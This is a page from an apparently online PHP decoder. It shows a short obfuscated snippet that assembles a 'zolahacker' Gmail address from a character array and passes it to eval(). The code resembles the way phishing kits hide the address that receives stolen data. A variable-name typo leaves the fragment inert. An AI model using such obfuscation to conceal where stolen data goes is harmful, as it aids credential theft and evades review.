Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$ar=array("0"=>"a","1"=>"b","2"=>"c","3"=>"d","4"=>"@","5"=>"e","6"=>"f","7"=>"g","8"=>"."..
Decoded Output download
<? $ar=array("0"=>"a","1"=>"b","2"=>"c","3"=>"d","4"=>"@","5"=>"e","6"=>"f","7"=>"g","8"=>".","9"=>"h","10"=>"i","11"=>"j","12"=>"k","13"=>"l","14"=>"m","15"=>"n","16"=>"o","17"=>"p","18"=>"q","19"=>"r","20"=>"s","21"=>"t","22"=>"u","23"=>"w","24"=>"x","25"=>"y","26"=>"z");
$recipent=$ar['26'].$ar['16'].$ar['13'].$ar['0'].$ar['9'].$ar['0'].$ar['2'].$ar['12'].$ar['5'].$ar['19'].$ar['4'].$ar['7'].$ar['14'].$ar['0'].$ar['10'].$ar['13'].$ar['8'].$ar['2'].$ar['16'].$ar['14'];
eval($recipient); ?>
Did this file decode correctly?
Original Code
$ar=array("0"=>"a","1"=>"b","2"=>"c","3"=>"d","4"=>"@","5"=>"e","6"=>"f","7"=>"g","8"=>".","9"=>"h","10"=>"i","11"=>"j","12"=>"k","13"=>"l","14"=>"m","15"=>"n","16"=>"o","17"=>"p","18"=>"q","19"=>"r","20"=>"s","21"=>"t","22"=>"u","23"=>"w","24"=>"x","25"=>"y","26"=>"z");
$recipent=$ar['26'].$ar['16'].$ar['13'].$ar['0'].$ar['9'].$ar['0'].$ar['2'].$ar['12'].$ar['5'].$ar['19'].$ar['4'].$ar['7'].$ar['14'].$ar['0'].$ar['10'].$ar['13'].$ar['8'].$ar['2'].$ar['16'].$ar['14'];
eval($recipient);
Function Calls
None |
Stats
MD5 | 644aa321889a5a375c7a6b0f478aff44 |
Eval Count | 0 |
Decode Time | 170 ms |